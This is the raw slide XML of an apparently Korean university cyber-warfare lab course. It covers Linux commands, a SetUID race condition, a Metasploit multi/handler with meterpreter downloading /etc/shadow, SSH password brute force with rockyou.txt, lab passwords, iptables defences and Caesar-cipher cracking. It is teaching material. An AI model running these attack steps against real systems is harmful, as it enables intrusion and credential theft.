                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>R-command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Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, Wireshark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디버거</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(GDB)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레이스 컨디션</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Race 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4"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934862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new=`ls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while [ "$old" == "$new"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new=`ls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(context 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의해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585575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입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11062957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Race 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   Race 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Race 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2980242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 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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cd /sec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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createTempFile.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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createTempFile</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createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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31837202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msfconsole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9442823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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use exploit/multi/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler)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2704005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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set RHOST 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exploit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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; download /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; exit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exit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dirty="0" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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입력 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9969196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23943698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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more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–w packet.txt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–r packet.txt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dirty="0"/>
              <a:t># netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>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-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>linux.elf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5050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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/elf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dirty="0" err="1"/>
              <a:t>linux.elf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dirty="0" err="1"/>
              <a:t>linux.elf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4164556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848555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2436462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–l test01 –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt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dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
              <a:t># exit</a:t>
            </a:r>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및 알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test123</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23347054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–w packet.txt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 packet.txt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iptables -A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35286648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dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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passwd test01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dirty="0"/>
              <a:t># iptables –A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3972431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hping3, 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hping3, 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hping3, WireShark, iftop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TCP Session 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ettercap</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00705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95454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NIS(Network Information Service)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서비스는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있도록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1744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10.10.1.166(NIS Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(PW : toor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # ssh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1073139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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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4379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575216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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31612540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7517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3604498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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호실습</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1719891429"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3112936" y="2690177"/>
          <a:ext cx="4932459" cy="1477772"/>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err="1"/>
                        <a:t>비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 암호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암복호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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대칭키</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암복호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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공개키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41499537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/Training/Cipher/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고전암호 크래킹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>카이사르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key=3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5554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/Training/Cipher/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호문</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37CA281A-5FC8-40F1-8D07-50952E77FC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943691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“cipher.txt”, “decryption.py”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“cipher.txt”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“decryption.py.py”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“decryption.py.py”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decryption.py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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6687787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Along with liberation, the Naval Academy was opened to foster elite naval officers who will protect the seas of the motherland by Admiral Son Won-il and other marine pioneers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland, and are still striving to raise the status of Korea in all parts of the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Like the adage that those who rule the sea dominate the world, we will meet the expectations of the nation and the people by nurturing talented people who protect the sea, which is our place of living and the channel of national prosperity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>We look forward to your continued interest and support for our Naval Academy.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4230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27442263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6148633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2412</TotalTime>
  <Words>9248</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>2446</Paragraphs>
  <Slides>104</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104</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="111" baseType="lpstr">
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Environ  환경</vt:lpstr>
      <vt:lpstr>/Environ/Python  Python 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory/T1   사이버전 실습체계 구조</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vt:lpstr>
      <vt:lpstr>/Theory/T2/2  # cd</vt:lpstr>
      <vt:lpstr>/Theory/T2/3  # ls</vt:lpstr>
      <vt:lpstr>/Theory/T2/4  리눅스 기본 명령어 – cp</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vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/7  7. FTP 서비스 설정</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  암호실습</vt:lpstr>
      <vt:lpstr>/Training/Cipher/1 고전암호 크래킹 – 카이사르 암호</vt:lpstr>
      <vt:lpstr>/Training/Cipher/1 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Appendix  부록</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 시연</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 관련 영상</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140</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-19T08:37:37Z</dcterms:modified>
</cp:coreProperties>
</file>